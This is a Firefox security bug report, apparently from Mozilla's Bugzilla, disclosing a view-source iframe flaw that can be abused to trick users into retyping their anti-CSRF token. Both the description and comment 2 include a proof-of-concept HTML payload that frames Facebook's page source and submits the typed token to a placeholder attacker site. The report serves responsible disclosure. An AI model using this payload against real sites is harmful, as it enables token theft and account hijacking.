Closed
Bug 1011848
Opened 11 years ago
Closed 11 years ago
Csrf-Token Hijaking throught SE + Firefox bug
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 624883
People
(Reporter: mr.k4rizma, Unassigned)
Details
(Keywords: csectype-disclosure, sec-moderate)
Attachments
(1 file)
(deleted),
text/html
|
Details |
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Steps to reproduce:
Hello Brother
almost websites use an anti-csrf token in order to prevent csrf bugs
however
using social engineering and a bug in firefox an attacker can simply steal this csrf-tken
The problem is in the "view-source:" option
because an attacker can Iframe the source code of any page unless it's using xframe option : deny or xframeoption : sameorigin
throught iframing the source code and using css
the attacker can confince the victime to enter the anti-csrf token as it is a capcha or anything else
If the victime enter his anti-csrf token
his account will be hijacked .
this simple code is written for the exploit purpose
<iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&%3Blayout=standard&%3Bshow_faces=true&%3Bcolorscheme=light&%3Bwidth=450&%3Bheight=80 >
</iframe>
<form name="input" action="hackersite.com/malcious.php" method="get">
To prouve that you are human Enter The text that you see above : <input type="text" name="user">
<input type="submit" value="Submit">
</form>
with alittle css I can only show the fb_dtsg which is the anti-csrf token on facebook
Actual results:
an attacker can iframe the source code of any website
Expected results:
The attacker shouldn't Iframe the source code
Reporter | ||
Updated•11 years ago
|
Component: Untriaged → Security
Reporter | ||
Comment 1•11 years ago
|
||
Reporter | ||
Comment 2•11 years ago
|
||
Comment on attachment 8424321 [details]
The poc is a sample for a bug on (facebook + firefox)
><iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&%3Blayout=standard&%3Bshow_faces=true&%3Bcolorscheme=light&%3Bwidth=450&%3Bheight=80 >
></iframe>
><form name="input" action="hackersite.com/malcious.php" method="get">
>To prouve that you are human Enter The text that you see above : <input type="text" name="user">
><input type="submit" value="Submit">
></form>
Comment 3•11 years ago
|
||
That's rather ingenious.
sec-moderate because this requires some user interaction.
Jesse or anyone, is there any good reason we should allow view-source at all in subframes, or can we just neuter it?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(jruderman)
Keywords: csectype-disclosure,
sec-moderate
Reporter | ||
Comment 4•11 years ago
|
||
@Benjamin Smedberg
I guess there is no good reason to allow view-source in subframe
It will only makes some trouble
others browser such Google chrome , opera are disabeling this option.
Updated•11 years ago
|
Status: NEW → RESOLVED
Closed: 11 years ago
Flags: needinfo?(jruderman)
Resolution: --- → DUPLICATE
Updated•9 years ago
|
Group: core-security → core-security-release
Updated•8 years ago
|
Group: core-security-release
You need to log in
before you can comment on or make changes to this bug.
Description
•